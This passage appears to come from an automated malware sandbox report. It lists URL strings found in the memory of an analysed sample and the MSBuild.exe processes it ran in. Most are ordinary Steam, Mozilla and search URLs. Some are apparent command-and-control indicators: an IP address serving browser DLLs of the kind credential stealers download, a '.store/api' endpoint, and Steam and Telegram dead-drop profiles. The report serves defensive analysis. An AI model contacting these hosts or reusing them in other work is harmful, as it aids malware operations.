                          Source: MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.197.9/mozglue.dll
                          Source: MSBuild.exe, 00000004.00000002.2190969803.0000000000DE8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.197.9/msvcp140.dll
                          Source: MSBuild.exe, 00000004.00000002.2190969803.0000000000DE8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.197.9/msvcp140.dll5
                          Source: MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.197.9/nss3.dll
                          Source: MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.197.9/nss3.dllrsg47
                          Source: MSBuild.exe, 00000004.00000002.2190969803.0000000000DE8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.197.9/softokn3.dll
                          Source: MSBuild.exe, 00000004.00000002.2190030987.000000000055D000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.197.9/sqlp.dll
                          Source: MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.197.9/vcruntime140.dll
                          Source: MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.197.9/vcruntime140.dllU
                          Source: MSBuild.exe, 00000004.00000002.2190030987.0000000000582000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://49.12.197.9ECAAFH
                          Source: HCAEHD.4.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                          Source: MSBuild.exe, 00000010.00000002.2176459575.0000000001382000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://advocachark.store/
                          Source: MSBuild.exe, 00000010.00000002.2176459575.0000000001351000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://advocachark.store/1$~
                          Source: MSBuild.exe, 00000010.00000002.2176459575.0000000001382000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://advocachark.store/Ri
                          Source: MSBuild.exe, 00000010.00000002.2176459575.0000000001382000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://advocachark.store/api
                          Source: MSBuild.exe, 00000010.00000002.2176459575.0000000001382000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://advocachark.store/api;
                          Source: MSBuild.exe, 00000010.00000002.2176459575.0000000001351000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://advocachark.store/api;$~(9
                          Source: MSBuild.exe, 00000010.00000002.2176459575.0000000001382000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://advocachark.store/bixd4
                          Source: MSBuild.exe, 00000010.00000002.2176459575.0000000001351000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://advocachark.store:443/api
                          Source: MSBuild.exe, 00000010.00000002.2176459575.00000000013A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.steampowered.com/
                          Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a
                          Source: 76561199780418869[1].htm.4.drString found in binary or memory: https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
                          Source: MSBuild.exe, 00000004.00000002.2190969803.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp, BAECFC.4.drString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696491991400800003.2&ci=1696491991993.
                          Source: MSBuild.exe, 00000004.00000002.2190969803.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp, BAECFC.4.drString found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696491991400800003.1&ci=1696491991993.12791&cta
                          Source: HCAEHD.4.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                          Source: HCAEHD.4.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                          Source: HCAEHD.4.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                          Source: MSBuild.exe, 00000010.00000002.2176459575.00000000013A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://checkout.steampowered.com/
                          Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.co
                          Source: MSBuild.exe, 00000010.00000002.2176459575.00000000013A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/
                          Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.2176459575.000000000132C000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drString found in binary or memory: https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=Ev2sBLgkgyWJ&a
                          Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drString found in binary or memory: https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=english
                          Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drString found in binary or memory: https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp
                          Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drString found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&l=english
                          Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drString found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r1
                          Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drString found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&l=englis
                          Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.2176459575.000000000132C000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drString found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
                          Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.2176459575.000000000132C000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.2180466192.00000000013CA000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drString found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
                          Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.2176459575.000000000132C000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
                          Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.2176459575.000000000132C000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=2ZRoxzol
                          Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.2176459575.000000000132C000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=fWwP
                          Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/global.js?v=9OzcxMXbaV84&l=english
                          Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC
                          Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalContent.js?v=f2hMA1v9Zkc8&l=engl
                          Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=english
                          Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/profile.js?v=f3vWO7swdDqp&l=english
                          Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&l=en
                          Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw
                          Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&l=e
                          Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL
                          Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=HeLxjRDbQrcV&l=e
                          Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&l=english
                          Source: 76561199780418869[1].htm.4.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&l=engl
                          Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=ezWS9te9Zwm9&l=en
                          Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&
                          Source: MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
                          Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.png
                          Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
                          Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
                          Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/auth_refresh.js?v=WgUxSlKTb3W1&amp
                          Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&am
                          Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSv
                          Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0
                          Source: MSBuild.exe, 00000004.00000002.2190969803.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp, BAECFC.4.drString found in binary or memory: https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg
                          Source: MSBuild.exe, 00000004.00000002.2190969803.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp, BAECFC.4.drString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
                          Source: HCAEHD.4.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                          Source: HCAEHD.4.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                          Source: HCAEHD.4.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                          Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drString found in binary or memory: https://help.steampowered.com/en/
                          Source: BAECFC.4.drString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqX1CqX4pbW1pbWfpbZ7ReNxR3UIG8zInwYIFIVs9eYi
                          Source: MSBuild.exe, 00000010.00000002.2176459575.00000000013A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.steampowered.com/
                          Source: MSBuild.exe, 00000004.00000002.2202720214.000000002047C000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2224013548.000000003E1AE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2218332574.00000000322C9000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2211910779.00000000263E4000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, nss3.dll.4.drString found in binary or memory: https://mozilla.org0/
                          Source: MSBuild.exe, 00000010.00000002.2176459575.00000000013A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net
                          Source: MSBuild.exe, 00000010.00000002.2176459575.00000000013A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://s.ytimg.com;
                          Source: MSBuild.exe, 00000010.00000002.2176459575.00000000013A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steam.tv/
                          Source: MSBuild.exe, 00000010.00000002.2176459575.00000000013A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast.akamaized.n
                          Source: 76561199780418869[1].htm.4.drString found in binary or memory: https://steamcommunity.com/
                          Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drString found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
                          Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drString found in binary or memory: https://steamcommunity.com/discussions/
                          Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.2176459575.000000000132C000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.2180466192.00000000013CA000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drString found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
                          Source: 76561199780418869[1].htm.4.drString found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199780418869
                          Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drString found in binary or memory: https://steamcommunity.com/market/
                          Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drString found in binary or memory: https://steamcommunity.com/my/wishlist/
                          Source: MSBuild.exe, 00000010.00000002.2176459575.0000000001351000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900
                          Source: MSBuild.exe, 00000010.00000002.2176459575.000000000132C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/badges
                          Source: MSBuild.exe, 00000010.00000002.2176459575.000000000132C000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.2180466192.00000000013CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/inventory/
                          Source: file.exe, file.exe, 00000000.00000002.1510351373.0000000000638000.00000004.00000001.01000000.00000003.sdmp, MSBuild.exe, MSBuild.exe, 00000004.00000002.2190969803.0000000000E2B000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190030987.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199780418869
                          Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drString found in binary or memory: https://steamcommunity.com/profiles/76561199780418869/badges
                          Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drString found in binary or memory: https://steamcommunity.com/profiles/76561199780418869/inventory/
                          Source: MSBuild.exe, 00000004.00000002.2190969803.0000000000E2B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199780418869f
                          Source: file.exe, 00000000.00000002.1510351373.0000000000638000.00000004.00000001.01000000.00000003.sdmp, MSBuild.exe, 00000004.00000002.2190030987.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199780418869u55uhttps://t.me/ae5edMozilla/5.0
                          Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drString found in binary or memory: https://steamcommunity.com/workshop/
                          Source: MSBuild.exe, 00000010.00000002.2176459575.00000000013A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.ste
                          Source: 76561199780418869[1].htm.4.drString found in binary or memory: https://store.steampowered.com/
                          Source: 76561199780418869[1].htm.4.drString found in binary or memory: https://store.steampowered.com/about/
                          Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drString found in binary or memory: https://store.steampowered.com/explore/
                          Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.2176459575.000000000132C000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.2180466192.00000000013CA000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drString found in binary or memory: https://store.steampowered.com/legal/
                          Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drString found in binary or memory: https://store.steampowered.com/mobile
                          Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drString found in binary or memory: https://store.steampowered.com/news/
                          Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drString found in binary or memory: https://store.steampowered.com/points/shop/
                          Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drString found in binary or memory: https://store.steampowered.com/privacy_agreement/
                          Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drString found in binary or memory: https://store.steampowered.com/stats/
                          Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drString found in binary or memory: https://store.steampowered.com/steam_refunds/
                          Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drString found in binary or memory: https://store.steampowered.com/subscriber_agreement/
                          Source: DBKKFC.4.drString found in binary or memory: https://support.mozilla.org
                          Source: DBKKFC.4.drString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                          Source: DBKKFC.4.drString found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.elMx_wJzrE6l
                          Source: file.exe, file.exe, 00000000.00000002.1510351373.0000000000638000.00000004.00000001.01000000.00000003.sdmp, MSBuild.exe, MSBuild.exe, 00000004.00000002.2190030987.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://t.me/ae5ed
                          Source: MSBuild.exe, 00000004.00000002.2190969803.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp, BAECFC.4.drString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_15d7e4b694824b33323940336fbf0bead57d89764383fe44
                          Source: MSBuild.exe, 00000004.00000002.2202720214.000000002047C000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2224013548.000000003E1AE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2218332574.00000000322C9000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2211910779.00000000263E4000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, nss3.dll.4.drString found in binary or memory: https://www.digicert.com/CPS0
                          Source: HCAEHD.4.drString found in binary or memory: https://www.ecosia.org/newtab/
                          Source: HCAEHD.4.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                          Source: MSBuild.exe, 00000010.00000002.2176459575.00000000013A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/recaptcha/
                          Source: MSBuild.exe, 00000010.00000002.2176459575.00000000013A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.cn/recaptcha/
                          Source: MSBuild.exe, 00000010.00000002.2176459575.00000000013A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/re
                          Source: MSBuild.exe, 00000004.00000002.2190969803.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp, BAECFC.4.drString found in binary or memory: https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&u
